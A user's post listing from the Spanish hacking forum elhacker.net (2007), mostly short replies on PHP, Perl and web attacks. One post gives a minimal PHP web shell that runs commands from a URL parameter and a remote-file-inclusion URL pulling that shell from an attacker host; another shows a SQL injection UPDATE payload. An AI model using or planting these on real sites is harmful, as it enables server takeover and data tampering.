elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: [1]
1  Programación / Scripting / Re: Desarrollo con Perl en: 31 Diciembre 2007, 15:18 pm
Activeperl

editor: emacs y gedit

 ;)
2  Seguridad Informática / Nivel Web / Re: duda con RFI....... en: 30 Diciembre 2007, 16:13 pm
aver, si te fijas en los codigos de las shells.
te pongo un ejemplo:

Código
  1. <?php
  2. $cmd=$_GET["cmd"];
  3. system($cmd);
  4. ?>

la gente que no tiene ni la minima idea de php, usa las shells c99 y todas esas que te lo hacen casi todo automatico, pero no saben como funcionan.

$cmd es una variable global, con $_GET hacemos una peticion.
todo lo que pongamos despues del parametro cmd se ejecutara con system y nos mostrara el resultado del comando.

* ademas de ejecutar con system, se pueden ejecutar comandos con: passthru, system_exec, shell_exec, exec y con eval.

Ejemplo:
http://localhost/shell.php?cmd=ls%20-lia

Por eso cuando en un RFI:
http://vulnerable/principal/main.php?pag_dest=http://atacante/shell.txt?cmd=ls

saludos.
3  Seguridad Informática / Nivel Web / Re: SELECT junto con update sql injection en: 29 Diciembre 2007, 22:36 pm
Un ejemplo:
http://localhost/noticia.asp?id_noticia=45+update+columna+set+tabla+='contenido'--

creo que te refieres a esto.  ;)
4  Programación / PHP / Re: mirar funciones desavilitadas con php en: 17 Mayo 2007, 16:12 pm
lo oque puedes hacer es mirar el phpinfo creando una pagina en la que pongas esto

Código:
<?
phpinfo();
?>

de ahi te sale toda la informacion de php con todas sus funciones y te dice si estan habilitadas o no

sip, se podria mirar hay pero da lata.
Aqui encontre esta que esta mejor ;)

Código:
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}

saludos.  ;)
5  Programación / PHP / mirar funciones desavilitadas con php en: 17 Mayo 2007, 03:37 am
bueno estaba viendo como mirar las funciones desavilitadas con php con esta funcion:

Código:
$disable_funcions=@ini_get('disable_functions');
echo $disable_funcions;

pero no me anda bien.
Alguien sabe otra forma?  ;D
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines